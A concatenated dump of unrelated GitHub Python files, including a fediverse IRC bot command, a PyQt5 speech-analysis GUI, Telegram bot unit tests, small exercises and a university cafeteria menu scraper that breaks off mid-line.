self.events.on(\"api.get.ap-outbox\").hook(\n self.server.ap_outbox, authenticated=False)\n def unload(self):\n if not self.server == None:\n self.server.unload()\n\n @utils.hook(\"received.command.fediverse\")\n @utils.hook(\"received.command.fedi\", alias_of=\"fediverse\")\n @utils.kwarg(\"help\", \"Get someone's latest toot\")\n @utils.kwarg(\"usage\", \"@@\")\n def fedi(self, event):\n account = None\n if not event[\"args\"]:\n account = event[\"user\"].get_setting(\"fediverse\", None)\n elif not \"@\" in event[\"args\"]:\n target = event[\"args_split\"][0]\n if event[\"server\"].has_user_id(target):\n target_user = event[\"server\"].get_user(target)\n account = target_user.get_setting(\"fediverse\", None)\n else:\n account = event[\"args_split\"][0]\n\n username = None\n instance = None\n if account:\n username, instance = ap_utils.split_username(account)\n\n if not username or not instance:\n raise utils.EventError(\"Please provide @@\")\n\n actor_url = ap_utils.find_actor(username, instance)\n\n if not actor_url:\n raise utils.EventError(\"Failed to find user\")\n\n actor = ap_actor.Actor(actor_url)\n if not actor.load():\n raise utils.EventError(\"Failed to find user\")\n\n items = actor.outbox.load()\n for item in items:\n if item[\"object\"].get(\"inReplyTo\", None) == None:\n first_item = item\n break\n\n if not first_item:\n raise utils.EventError(\"No toots found\")\n\n cw, out, url = ap_utils.format_note(actor, first_item)\n shorturl = self.exports.get_one(\"shorturl\")(event[\"server\"], url,\n context=event[\"target\"])\n\n if cw:\n out = \"CW: %s - %s\" % (cw, shorturl)\n else:\n out = \"%s - %s\" % (out, shorturl)\n event[\"stdout\"].write(out)\n","repo_name":"chiefnoah/bitbot","sub_path":"modules/fediverse/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"39383591415","text":"from collections import defaultdict\nimport json\n\n\nwith open('food_services.json ', 'r', encoding='utf-8') as f:\n d = defaultdict(lambda : ('', 0))\n for rest in json.load(f):\n seats_count = int(rest['SeatsCount'])\n if seats_count > d[rest['TypeObject']][1]:\n d[rest['TypeObject']] = (rest['Name'], seats_count)\nfor k, v in sorted(d.items(), key=lambda x: x[0]):\n print(f'{k}: {v[0]}, {v[1]}')\n \n","repo_name":"Serebryankka/My-Solutions-Python-Generation-a-course-for-professionals","sub_path":"Module_4/Module_4_4/Module_4_4_16.py","file_name":"Module_4_4_16.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36932207871","text":"import sys\nfrom PyQt5 import QtCore, QtGui\nimport PyQt5.QtWidgets as QWidgets\nimport copy\nfrom PyQt5.QtWidgets import QApplication\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport PyQt5.QtMultimedia as Qmedia\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom classfication import thresholdFun as thd\nfrom wavfeature import wavfeature as wf\nimport until\nmatplotlib.use(\"Qt5Agg\")\n\n\nclass MyMainWindow(QWidgets.QMainWindow):\n\n def __init__(self):\n super().__init__()\n # 主窗口初始化\n self.setWindowTitle(\"Qt test\")\n self.setWindowIcon(QtGui.QIcon(\"source/voicesearch_128px_526004_easyicon.net.ico\"))\n # 主窗口部件初始化\n # 状态栏初始化\n self.status = self.statusBar()\n self.setStatusBar(self.status)\n self.file_dict = {} # 语音特征对象Feature\n self.middle_data = {} # 存储中间计算出来的特征以及结果\n self.current_file = None # 当前选中语音文件的文件名\n self.class_feature_data = dict() # 分类方法使用的语音特征字典\n self.current_data = None # 当前选中的绘图使用的数据,通常是一个字典\n # menu初始化\n self.menu_bar = self.menuBar()\n self.menu1_file = QWidgets.QMenu(\"文件\")\n self.menu2_data = QWidgets.QMenu(\"数据\")\n self.menu3_tools = QWidgets.QMenu(\"工具\")\n self.data_action = QWidgets.QAction(\"特征数据\", self.menu2_data)\n self.open_file = QWidgets.QAction(\"打开文件\", self.menu1_file)\n self.add_noise = QWidgets.QAction(\"加噪\", self.menu3_tools)\n self.data_action.setShortcut(\"Ctrl+D\")\n self.open_file.setShortcut(\"Ctrl+O\")\n self.data_action.triggered.connect(self.show_feature_list)\n self.open_file.triggered.connect(self.get_file)\n self.add_noise.triggered.connect(self.add_noises)\n self.menu2_data.addAction(self.data_action)\n self.menu1_file.addAction(self.open_file)\n self.menu3_tools.addAction(self.add_noise)\n\n self.menu_bar.addMenu(self.menu1_file)\n self.menu_bar.addMenu(self.menu2_data)\n self.menu_bar.addMenu(self.menu3_tools)\n self.middle_data_dock = QWidgets.QDockWidget(\"MiddleData\", self)\n self.middle_data_listwidget = QWidgets.QListWidget()\n self.right_click_menu = QWidgets.QMenu(self.middle_data_listwidget)\n self.middle_data_listwidget.itemDoubleClicked.connect(self.get_current_data)\n self.clear_mid_data = QWidgets.QPushButton\n self.middle_data_dock.setWidget(self.middle_data_listwidget)\n self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.middle_data_dock)\n self.init_dock()\n # 主窗口载入\n self.main_window = MyWindow()\n self.main_window.list_file.clicked.connect(self.get_item)\n self.main_window.list_file.doubleClicked.connect(self.get_voice_data)\n self.setCentralWidget(self.main_window)\n # main_window逻辑\n self.main_window.plot_button.clicked.connect(self.__plot)\n self.main_window.features_combobox.activated.connect(self.choose_features_fun)\n self.main_window.classfication_combobox.activated.connect(self.choose_classfun)\n self.main_window.clear_button.clicked.connect(self.clear_plot)\n # player model\n self.player = Qmedia.QMediaPlayer()\n self.recoder = Qmedia.QAudioRecorder()\n self.current_playlist = Qmedia.QMediaPlaylist()\n self.init_player_recoder()\n self.status_player = -1 # 1-播放 2-暂停 0-停止\n self.status_recoder = -1 # 1-录音 2-暂停 0-停止\n self.main_window.play_button.clicked.connect(self.play_voice)\n self.main_window.stop_button.clicked.connect(self.stop_play)\n self.main_window.pause_button.clicked.connect(self.pause_play)\n self.main_window.recoder_button.clicked.connect(self.recoder_voice)\n\n def add_noises(self):\n voice_path, ok_press = QWidgets.QFileDialog.getOpenFileName(self, \"ChooseVoice\", '.\\\\', '*.wav')\n if ok_press:\n voice = voice_path\n else:\n return 0\n noise_path, ok_press = QWidgets.QFileDialog.getOpenFileName(self, \"Choose\", '.\\\\', '*.wav')\n if ok_press:\n noise = noise_path\n else:\n return 0\n snr_value, ok_press = QWidgets.QInputDialog.getInt(self, \"Input SNR\", \"SNR:\", 0, -10, 20, 1)\n if ok_press:\n snr = snr_value\n else:\n return 0\n until.add_noise(voice, noise, snr)\n\n def closeEvent(self, a0: QtGui.QCloseEvent):\n reply = QWidgets.QMessageBox.question(self, 'Message', 'Pres Yes to Close.',\n QWidgets.QMessageBox.Yes | QWidgets.QMessageBox.No,\n QWidgets.QMessageBox.Yes)\n\n if reply == QWidgets.QMessageBox.Yes:\n app.quit()\n else:\n try:\n a0.ignore()\n except AttributeError:\n pass\n\n def init_player_recoder(self):\n self.player.setVolume(60)\n self.player.stateChanged.connect(self.my_state_change)\n self.player.mediaStatusChanged.connect(self.my_statues_change)\n self.recoder.audioSettings().setCodec('audio/x-wav')\n self.recoder.audioSettings().setChannelCount(1)\n self.recoder.defaultAudioInput()\n self.current_playlist.setPlaybackMode(Qmedia.QMediaPlaylist.CurrentItemOnce)\n\n def my_statues_change(self):\n # 当输出设备更换时得处理方式\n if self.player.mediaStatus() == Qmedia.QMediaPlayer.LoadedMedia and self.status_player == 1:\n self.player.play()\n\n def my_state_change(self):\n if self.player.state() == Qmedia.QMediaPlayer.StoppedState:\n self.player.stop()\n\n def get_file(self):\n file_dialog = QWidgets.QFileDialog()\n f, _ = file_dialog.getOpenFileNames(self, \"OpenFiles\", \".\\\\\", \"*.wav\")\n for file in f:\n file_name = file.split('/')[-1]\n if file_name not in set(self.file_dict.keys()):\n self.file_dict[file_name] = wf.Feature(file)\n self.main_window.list_file.addItem(file_name)\n else:\n QWidgets.QMessageBox.information(self, \"Warring\", \"文件\"+file_name+\"已读取\",\n QWidgets.QMessageBox.Yes | QWidgets.QMessageBox.No,\n QWidgets.QMessageBox.Yes)\n\n def get_item(self):\n # set current_file ,please note that current_file is a item object\n self.current_file = self.main_window.list_file.currentItem().text()\n self.status.showMessage(\"当前文件:\"+self.current_file, 5000)\n\n def get_voice_data(self):\n if self.current_file is None:\n self.current_file = self.main_window.list_file.currentItem().text()\n self.status.showMessage(\"当前文件:\" + self.current_file, 5000)\n current_item = self.file_dict[self.current_file]\n self.current_data = current_item.data\n\n def get_current_data(self):\n data_name = self.middle_data_listwidget.currentItem().text()\n self.current_data = self.middle_data[data_name]\n\n def __plot(self):\n subplot = self.main_window.subplot_lineEdit.text()\n hold_on = self.main_window.is_holdOn.isChecked()\n y = self.current_data['y']\n if len(subplot) == 0:\n subplot = \"111\"\n if len(subplot) != 3:\n QWidgets.QMessageBox.warning(self, '参数错误', 'subplot参数错误')\n return 0\n ax = self.main_window.figure.add_subplot(subplot)\n #ax.set_xlim(min(self.current_data['x']), )\n if len(self.current_data) > 1:\n x = self.current_data['x']\n if hold_on is False:\n plt.cla()\n ax.plot(x, y)\n else:\n ax.plot(x, y)\n else:\n ax.plot(y)\n self.main_window.canvas.draw()\n\n def clear_plot(self):\n self.main_window.figure.clear()\n self.main_window.canvas.draw()\n\n def init_dock(self):\n self.middle_data_dock.setAllowedAreas(QtCore.Qt.RightDockWidgetArea)\n self.middle_data_dock.setFeatures(QWidgets.QDockWidget.AllDockWidgetFeatures)\n add_item_to_class = self.right_click_menu.addAction(\"添加特征\")\n del_item_from_class = self.right_click_menu.addAction(\"删除特征\")\n del_middle_data = self.right_click_menu.addAction(\"删除数据\")\n add_item_to_class.triggered.connect(self.add_to_class_feature)\n del_item_from_class.triggered.connect(self.del_from_class_feature)\n del_middle_data.triggered.connect(self.del_current_middle_data)\n self.middle_data_listwidget.setContextMenuPolicy(QtCore.Qt.CustomContextMenu)\n self.middle_data_listwidget.customContextMenuRequested.connect(self.show_dock_context_menu)\n\n def show_dock_context_menu(self):\n self.right_click_menu.move(QtGui.QCursor.pos())\n self.right_click_menu.show()\n\n def add_to_class_feature(self):\n name = self.middle_data_listwidget.currentItem().text()\n self.class_feature_data[name] = copy.deepcopy(self.middle_data[name])\n text = self.main_window.threshold_lineedit.text() + name + \" \"\n self.main_window.threshold_lineedit.setText(text)\n pass\n\n def del_from_class_feature(self):\n name = self.middle_data_listwidget.currentItem().text()\n try:\n self.class_feature_data.pop(name)\n text = self.main_window.threshold_lineedit.text().replace(name+\" \", \"\")\n self.main_window.threshold_lineedit.setText(text)\n except IndexError:\n pass\n pass\n\n def del_current_middle_data(self):\n name = self.middle_data_listwidget.currentItem().text()\n row = self.middle_data_listwidget.currentRow()\n try:\n self.middle_data.pop(name)\n self.middle_data_listwidget.takeItem(row)\n except IndexError:\n QWidgets.QMessageBox.warning(self, '删除错误', 'MiddleDate中没有该值')\n\n def show_feature_list(self):\n state = self.middle_data_dock.isVisible()\n if state:\n self.middle_data_dock.close()\n else:\n self.middle_data_dock.show()\n\n def choose_features_fun(self):\n # todo : 执行特征提取函数,将特征存入feature_data字典中\n # todo : 更新docklistitem,并显示docklist\n feature = self.main_window.features_combobox.currentText()\n if feature == \"ST_energy\":\n name = self.current_file+\"stenergy\"\n current_obj = self.file_dict[self.current_file]\n st_energy = current_obj.st_en()\n self.middle_data[name] = st_energy\n self.middle_data_listwidget.addItem(name)\n self.status.showMessage(\"短时能量提取\", 2000)\n pass\n elif feature == \"ST_ZeroCross\":\n name = self.current_file + \"stzcr\"\n st_zcr = self.file_dict[self.current_file].st_zcr()\n self.middle_data[name] = st_zcr\n self.middle_data_listwidget.addItem(name)\n self.status.showMessage(\"短时过零率提取\", 2000)\n pass\n pass\n\n def choose_classfun(self):\n # todo 根据选择的分类函数调用相应的方法\n # todo return\n if self.class_feature_data == {}:\n QWidgets.QMessageBox.information(self, \"Warring\", \"没有选择分类特征\",\n QWidgets.QMessageBox.Yes | QWidgets.QMessageBox.No,\n QWidgets.QMessageBox.Yes)\n return 0\n elif len(self.class_feature_data) > 2:\n QWidgets.QMessageBox.information(self, \"Warring\", \"特征数不符合该方法\",\n QWidgets.QMessageBox.Yes | QWidgets.QMessageBox.No,\n QWidgets.QMessageBox.Yes)\n return 0\n\n if self.main_window.classfication_combobox.currentText() == \"Threshold\":\n th1, _ = QWidgets.QInputDialog.getDouble(self.main_window, \"输入TH1的值\", \"TH1\", value=1.2)\n th2, _ = QWidgets.QInputDialog.getDouble(self.main_window, \"输入TH2的值\", \"TH2\", value=1.6)\n speech_mark = thd.threshold(self.class_feature_data, threshold_val1=th1, threshold_val2=th2)\n self.middle_data_listwidget.addItem(\"speech_mark_threshold\")\n self.middle_data[\"speech_mark_threshold\"] = speech_mark\n pass\n\n def play_voice(self):\n self.status_player = 1\n if self.player.state() == Qmedia.QMediaPlayer.StoppedState:\n if self.player.mediaStatus() == Qmedia.QMediaPlayer.NoMedia:\n try:\n self.current_playlist.clear()\n self.current_playlist.addMedia(Qmedia.QMediaContent(QtCore.QUrl.fromLocalFile(\n self.file_dict[self.current_file].filename)))\n self.player.setPlaylist(self.current_playlist)\n except:\n QWidgets.QMessageBox.Warning(self, \"No voice File Choose\",\n \"Please Choose a Voice File\\n(double click file item)\")\n return 0\n\n elif self.player.mediaStatus() == Qmedia.QMediaPlayer.LoadedMedia:\n self.player.play()\n self.statusBar().showMessage(\"音频文件\"+self.current_file+\"播放中...\", 2000)\n elif self.player.mediaStatus() == Qmedia.QMediaPlayer.BufferedMedia:\n self.player.play()\n self.statusBar().showMessage(\"音频文件\" + self.current_file + \"播放中...\", 2000)\n elif self.player.state() == Qmedia.QMediaPlayer.PlayingState:\n self.statusBar().showMessage(\"音频文件\" + self.current_file + \"播放中...\", 2000)\n elif self.player.state() == Qmedia.QMediaPlayer.PausedState:\n self.player.play()\n self.statusBar().showMessage(\"音频文件\" + self.current_file + \"播放中...\", 2000)\n\n def stop_play(self):\n self.status_player = 0\n if self.player.state() == Qmedia.QMediaPlayer.PlayingState:\n self.player.stop()\n self.statusBar().showMessage(\"播放停止\", 2000)\n elif self.player.state() == Qmedia.QMediaPlayer.PausedState:\n self.player.stop()\n self.statusBar().showMessage(\"播放停止\", 2000)\n elif self.player.state() == Qmedia.QMediaPlayer.StoppedState:\n self.statusBar().showMessage(\"播放停止\", 2000)\n pass\n # ----------------------------------------------------------------\n if self.status_recoder == 1 or self.status_recoder == 2:\n save_url = QWidgets.QFileDialog.getSaveFileUrl(self, \"Save file\", \".\\\\recoder.wav\", \"Audio(*.wav)\")\n if save_url[0] != QtCore.QUrl(''):\n self.recoder.setOutputLocation(save_url[0])\n self.status_recoder = 0\n if self.recoder.state() == Qmedia.QAudioRecorder.RecordingState:\n self.recoder.stop()\n self.statusBar().showMessage(\"录音停止,录音文件:\"+save_url[1]+\"已保存\", 2000)\n elif self.recoder.state() == Qmedia.QAudioRecorder.PausedState:\n self.recoder.stop()\n self.statusBar().showMessage(\"录音停止,录音文件:\"+save_url[1]+\"已保存\", 2000)\n elif self.recoder.state() == Qmedia.QAudioRecorder.StoppedState:\n pass\n\n def pause_play(self):\n self.status_player = 2\n if self.player.state() == Qmedia.QMediaPlayer.PlayingState:\n self.player.pause()\n self.statusBar().showMessage(\"播放暂停\", 2000)\n # ------------------------------------------------------------------\n if self.recoder.state() == Qmedia.QAudioRecorder.RecordingState:\n self.status_recoder = 2\n self.recoder.pause()\n self.statusBar().showMessage(\"录音暂停!\", 2000)\n\n def recoder_voice(self):\n self.status_recoder = 1\n if self.recoder.state() == Qmedia.QAudioRecorder.StoppedState:\n self.recoder.record()\n self.statusBar().showMessage(\"录音中...\", 2000)\n elif self.recoder.state() == Qmedia.QAudioRecorder.PausedState:\n self.recoder.record()\n self.statusBar().showMessage(\"恢复录音\", 2000)\n elif self.recoder.state() == Qmedia.QAudioRecorder.RecordingState:\n self.statusBar().showMessage(\"录音中...\", 2000)\n pass\n\n\nclass MyWindow(QWidgets.QWidget):\n\n def __init__(self):\n super().__init__()\n self.main_window_layout = QWidgets.QVBoxLayout()\n # topLayout 布局\n self.top_layout = QWidgets.QHBoxLayout()\n\n self.left_top_layout = QWidgets.QVBoxLayout()\n self.plot_button = QWidgets.QPushButton(\"绘图\")\n self.clear_button = QWidgets.QPushButton(\"清除\")\n self.data_lineEdit = QWidgets.QLineEdit()\n self.subplot_lineEdit = QWidgets.QLineEdit()\n self.is_holdOn = QWidgets.QCheckBox()\n self.play_button = QWidgets.QPushButton(\"播放\")\n self.pause_button = QWidgets.QPushButton(\"暂停\")\n self.stop_button = QWidgets.QPushButton(\"停止\")\n self.recoder_button = QWidgets.QPushButton(\"录制\")\n\n self.right_top_layout = QWidgets.QVBoxLayout()\n self.features_combobox = QWidgets.QComboBox()\n self.classfication_combobox = QWidgets.QComboBox()\n self.threshold_lineedit = QWidgets.QLineEdit()\n self.figure = plt.figure()\n self.canvas = FigureCanvas(self.figure)\n self.list_file = QWidgets.QListWidget()\n self.init_top_layout()\n\n # bottom_layout 布局\n self.bottom_layout = QWidgets.QHBoxLayout()\n self.init_bottom_layout()\n\n # 主窗口布局\n self.main_window_layout.addLayout(self.top_layout, stretch=2)\n self.main_window_layout.addLayout(self.bottom_layout, stretch=1)\n self.setLayout(self.main_window_layout)\n\n def init_top_layout(self):\n # left_top_layout\n plot_buttons = QWidgets.QHBoxLayout()\n plot_buttons.addWidget(self.plot_button)\n plot_buttons.addWidget(self.clear_button)\n\n plot_choice_layout = QWidgets.QFormLayout()\n self.subplot_lineEdit.setPlaceholderText(\"整形\")\n subplot_validator = QtGui.QIntValidator(self)\n subplot_validator.setRange(111, 999)\n self.subplot_lineEdit.setValidator(subplot_validator)\n plot_choice_layout.addRow(QWidgets.QLabel(\"数据:\"), self.data_lineEdit)\n plot_choice_layout.addRow(QWidgets.QLabel(\"SubPlot:\"), self.subplot_lineEdit)\n plot_choice_layout.addRow(QWidgets.QLabel(\"Hold\"), self.is_holdOn)\n\n play_layout = QWidgets.QHBoxLayout()\n play_layout.addWidget(self.play_button)\n play_layout.addWidget(self.pause_button)\n play_layout.addWidget(self.stop_button)\n play_layout.addWidget(self.recoder_button)\n\n self.left_top_layout.addLayout(plot_buttons)\n self.left_top_layout.addLayout(plot_choice_layout)\n self.left_top_layout.addWidget(self.list_file)\n self.left_top_layout.addLayout(play_layout)\n # right_top_layout\n test_button = QWidgets.QPushButton(\"Test\")\n features_layout = QWidgets.QFormLayout()\n self.features_combobox.addItem(\"ST_energy\")\n self.features_combobox.addItem(\"ST_ZeroCross\")\n features_layout.addRow(QWidgets.QLabel(\"Features:\"), self.features_combobox)\n classification_layout = QWidgets.QFormLayout()\n self.classfication_combobox.addItem(\"Threshold\")\n classification_layout.addRow(QWidgets.QLabel(\"ClassMethod:\"), self.classfication_combobox)\n self.right_top_layout.addWidget(QWidgets.QLabel(\"分类使用的特征⬇\"))\n self.right_top_layout.addWidget(self.threshold_lineedit)\n\n self.right_top_layout.addLayout(features_layout)\n self.right_top_layout.addLayout(classification_layout)\n self.right_top_layout.addWidget(test_button)\n self.right_top_layout.addStretch()\n\n self.top_layout.addLayout(self.left_top_layout, stretch=1)\n self.top_layout.addStretch()\n self.top_layout.addWidget(self.canvas, stretch=3)\n self.top_layout.addStretch()\n self.top_layout.addLayout(self.right_top_layout, stretch=1)\n\n def init_bottom_layout(self):\n button = QWidgets.QPushButton(\"Test\")\n self.bottom_layout.addWidget(button)\n\n\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n form = MyMainWindow()\n form.show()\n sys.exit(app.exec_())\n\n","repo_name":"xiaochencen/qt-vad","sub_path":"main_ui.py","file_name":"main_ui.py","file_ext":"py","file_size_in_byte":20857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6162538122","text":"from unittest.mock import AsyncMock, MagicMock, Mock\n\nimport pytest\nfrom aiogram.types import AllowedUpdates, ChatMemberStatus\n\nfrom src.bots.tg import TelegramBot\n\n\n@pytest.fixture\ndef dispatcher():\n dispatcher = MagicMock()\n\n dispatcher.start_polling = AsyncMock()\n dispatcher.bot.close = AsyncMock()\n return dispatcher\n\n\n@pytest.fixture\ndef chats_repo():\n chats_repo_mock = MagicMock()\n return chats_repo_mock\n\n\n@pytest.mark.asyncio\nasync def test_tg_start(dispatcher: Mock, chats_repo: Mock):\n relax_time = 10\n\n bot = TelegramBot(dispatcher=dispatcher, chats_repo=chats_repo, relax=relax_time)\n await bot.check_updates()\n\n dispatcher.register_my_chat_member_handler.assert_called_once_with(\n bot.chat_member_handler\n )\n dispatcher.register_message_handler.assert_called_once_with(\n bot.start_message_handler, commands=\"start\"\n )\n dispatcher.start_polling.assert_called_once_with(\n allowed_updates=AllowedUpdates.MESSAGE + AllowedUpdates.MY_CHAT_MEMBER,\n relax=relax_time,\n )\n dispatcher.bot.close.assert_called_once()\n\n\n@pytest.mark.asyncio\nasync def test_tg_chat_member_handler_added_to_chat(dispatcher, chats_repo):\n chat_id = 5\n chat_ids_str = \"5\"\n\n bot = TelegramBot(dispatcher=dispatcher, chats_repo=chats_repo)\n\n chat_member_statuses = [\n ChatMemberStatus.MEMBER,\n ChatMemberStatus.ADMINISTRATOR,\n ChatMemberStatus.CREATOR,\n ChatMemberStatus.RESTRICTED,\n ]\n\n for status in chat_member_statuses:\n chats_repo.add_chat = AsyncMock()\n chats_repo.remove_chat = AsyncMock()\n\n event = MagicMock()\n event.new_chat_member.status = status\n event.chat.id = chat_id\n await bot.chat_member_handler(event)\n chats_repo.add_chat.assert_called_once_with(chat_ids_str)\n chats_repo.remove_chat.assert_not_called()\n\n\n@pytest.mark.asyncio\nasync def test_tg_chat_member_handler_left_chat(dispatcher: Mock, chats_repo: Mock):\n chat_id = 5\n chat_ids_str = \"5\"\n\n bot = TelegramBot(dispatcher=dispatcher, chats_repo=chats_repo)\n\n left_statuses = [\n ChatMemberStatus.LEFT,\n ChatMemberStatus.KICKED,\n ]\n\n for status in left_statuses:\n chats_repo.add_chat = AsyncMock()\n chats_repo.remove_chat = AsyncMock()\n\n event = MagicMock()\n event.new_chat_member.status = status\n event.chat.id = chat_id\n await bot.chat_member_handler(event)\n chats_repo.remove_chat.assert_called_once_with(chat_ids_str)\n chats_repo.add_chat.assert_not_called()\n\n\n@pytest.mark.asyncio\nasync def test_tg_start_message_handler_first_message(\n dispatcher: Mock, chats_repo: Mock\n):\n chat_id = 5\n chat_ids_str = \"5\"\n\n chats_repo.is_chat_id_subscribed = AsyncMock(return_value=False)\n chats_repo.add_chat = AsyncMock()\n\n message = MagicMock()\n message.chat.id = chat_id\n message.answer = AsyncMock()\n\n bot = TelegramBot(dispatcher=dispatcher, chats_repo=chats_repo)\n\n await bot.start_message_handler(message)\n chats_repo.add_chat.assert_called_once_with(chat_ids_str)\n message.answer.assert_called_once()\n\n\n@pytest.mark.asyncio\nasync def test_tg_start_message_handler_second_message(\n dispatcher: Mock, chats_repo: Mock\n):\n chats_repo.is_chat_id_subscribed = AsyncMock(return_value=True)\n chats_repo.add_chat = AsyncMock()\n\n message = MagicMock()\n message.chat.id = 5\n message.answer = AsyncMock()\n\n bot = TelegramBot(dispatcher=dispatcher, chats_repo=chats_repo)\n\n await bot.start_message_handler(message)\n chats_repo.add_chat.assert_not_called()\n message.answer.assert_called_once()\n","repo_name":"vdor/tgn-water-bot","sub_path":"test/test_bots/test_tg.py","file_name":"test_tg.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10373792201","text":"# 9.Um comerciante comprou um produto e quer vende-lo com um lucro de 45% se o valor da compra for\n# menor que 20,00, caso contrário o lucro será de 30%. entrar com o valor do produto \n# e imprimir o valor da venda.\n\nvalor_produto = float(input(\"Digite o valor do produto: \"))\nlucro = 0;\n\nif(valor_produto < 20):\n lucro = valor_produto * 0.45\nelse:\n lucro = valor_produto * 0.30\n \nprint(\"Valor da venda: \", valor_produto + lucro)","repo_name":"mtrs8/listas-python","sub_path":"lista005/exercicio009.py","file_name":"exercicio009.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26532856238","text":"import sys\n\n\ndef read_lines():\n return [[int(num) for num in line.split('\\t')] for\n line in sys.stdin.readlines()]\n\n\ndef max_min_checksum(line):\n return max(line) - min(line)\n\n\ndef divisors_checksum(line):\n last_i = len(line)\n for i in range(0, last_i):\n i_item = line[i]\n for j in range(0, last_i):\n j_item = line[j]\n if i != j and i_item % j_item == 0:\n return i_item // j_item\n\n\ndef compute_checksum(f):\n lines = read_lines()\n checksum_list = [f(line) for line in lines]\n return sum(checksum_list)\n\n\nprint(compute_checksum(max_min_checksum))\nprint(compute_checksum(divisors_checksum))\n","repo_name":"howsad/aoc2017","sub_path":"src/day2/day2.py","file_name":"day2.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39110370968","text":"import requests\nfrom bs4 import BeautifulSoup\nimport re\n\nfrom django.utils import timezone\nfrom meals.models import Meal, Menu, Restaurant\n\ndef crawl():\n kukje_crawler()\n student_crawler()\n hankyung_crawler()\n\ndef dates_handler(dates, restaurant_name):\n restaurant = Restaurant.objects.get(name=restaurant_name)\n for date in dates:\n Menu.objects.get_or_create(date=date, restaurant=restaurant)\n\ndef meal_handler(type, meals, prices, dates, restaurant_name):\n restaurant = Restaurant.objects.get(name=restaurant_name)\n for index, meal_names in enumerate(meals):\n if not meal_names:\n continue\n if isinstance(meal_names, list):\n for meal_name in meal_names:\n meal, _ = Meal.objects.get_or_create(name=meal_name, type=type, restaurant=restaurant)\n meal.price = prices[index]\n meal.save()\n menu = Menu.objects.get(date=dates[index], restaurant=restaurant)\n menu.meals.add(meal)\n else:\n meal, _ = Meal.objects.get_or_create(name=meal_names, type=type, restaurant=restaurant)\n meal.price = prices[index]\n meal.save()\n menu = Menu.objects.get(date=dates[index], restaurant=restaurant)\n menu.meals.add(meal)\n\ndef kukje_crawler():\n page = requests.get('http://coop.yonsei.ac.kr/Menu/Kukje.asp')\n soup = BeautifulSoup(page.content, 'html.parser')\n KUKJE_RESTAURANTS = [\"Y-플라자\", \"송도1학사\", \"송도2학사\"]\n KUKJE_DIVISIONS = [[\"Soban\", \"Western 1\", \"Western 2\", \"Chef's special\", \"Hotbowl 1\", \"Hotbowl 2\", \"Chinese 1\", \"Chinese 2\"], [\"Hot Bowl\", \"Western\", \"HotBowl\", \"Westernl\", \"Snack\"], [\"Korean\", \"International\", \"컵밥\"]]\n KUKJE_MEAL_TIMES = [\"(아침)\", \"(점심)\", \"(저녁)\"]\n COLUMN_COUNT = 8\n division_time_mixed_re = re.compile(\"(.*)(\\(아침\\)|\\(점심\\)|\\(저녁\\))\")\n chinese2_meal_re = re.compile(\"[-,0-9]{,}00원\")\n dates = None\n meals = []\n prices = []\n current_meal_time = None\n current_division = None\n current_rowspan = 0\n current_row = 0\n current_col = 0\n for index, current_restaurant in enumerate(KUKJE_RESTAURANTS):\n sub_soup = soup.find(\"tr\", id=\"lay%s\" % (index)).table.table\n trs = sub_soup.table.find_all(\"tr\") if sub_soup.table else sub_soup.find_all(\"tr\")\n for tr in trs:\n if tr.td.attrs.get(\"colspan\") == COLUMN_COUNT.__str__():\n tr.extract()\n continue\n current_rowspan = tr.td.attrs.get(\"rowspan\", 1) if current_row == 0 else current_rowspan\n # Restaurant name and the dates \n if tr.td.font and tr.td.font.attrs.get(\"color\") == \"#CCFF00\":\n dates = [td.font.get_text().replace(\"\\xa0\", \"\") for td in tr.find_all(\"td\")[1:]]\n def get_date(date):\n year = timezone.localtime(timezone.now()).year\n month = re.compile(\"([0-9]{0,2})월\").findall(date)[0].zfill(2)\n day = re.compile(\"([0-9]{0,2})일\").findall(date)[0].zfill(2)\n return \"%s-%s-%s\" % (year, month, day)\n dates = list(map(get_date, dates))\n dates_handler(dates=dates, restaurant_name=current_restaurant)\n continue\n if current_row == 0:\n current_rowspan = int(tr.td.attrs.get(\"rowspan\", 1))\n td = tr.td\n current_division = \"\"\n current_meal_time = \"\"\n for font in [ele.get_text() for ele in td.find_all(\"font\")]:\n if KUKJE_DIVISIONS[index].__contains__(font):\n current_division = font\n elif KUKJE_MEAL_TIMES.__contains__(font):\n current_meal_time = font\n mixed_datum = division_time_mixed_re.findall(font)\n if mixed_datum and mixed_datum[0] and mixed_datum[0][0] and mixed_datum[0][1]:\n current_division = mixed_datum[0][0]\n current_meal_time = mixed_datum[0][1]\n if (current_rowspan == 2 and current_row == 0) or (current_rowspan == 3 and current_row == 1):\n for td in tr.find_all(\"td\"):\n meal = td.font.get_text() if td.font else td.get_text().replace(\"\\n\", \"\").replace(\"\\r\", \"\").replace(\"\\xa0\", \"\").strip()\n colspan = int(td.attrs.get(\"colspan\", 1))\n if td.attrs.get(\"rowspan\") == \"2\" and chinese2_meal_re.search(meal):\n price = []\n tokens = chinese2_meal_re.findall(meal)\n price = tokens[0]\n meal_split = meal.split(price)\n meal = \"%s(%s)\" % (meal_split[0].replace('-', '').strip(), meal_split[1].replace('-', ''))\n prices += colspan * [price]\n meals += colspan * [meal]\n if current_rowspan == 2 and current_row == 0:\n meals.__delitem__(0)\n meals = list(filter((\"\").__ne__, meals))\n if (current_rowspan == 2 and current_row == 1) or (current_rowspan == 3 and current_row == 2):\n for td in tr.find_all(\"td\"):\n price = td.font.get_text() if td.font else td.get_text().replace(\"\\n\", \"\").replace(\"\\r\", \"\").replace(\"\\xa0\", \"\").strip()\n colspan = int(td.attrs.get(\"colspan\", 1))\n prices += colspan * [price]\n prices = list(filter((\"\").__ne__, 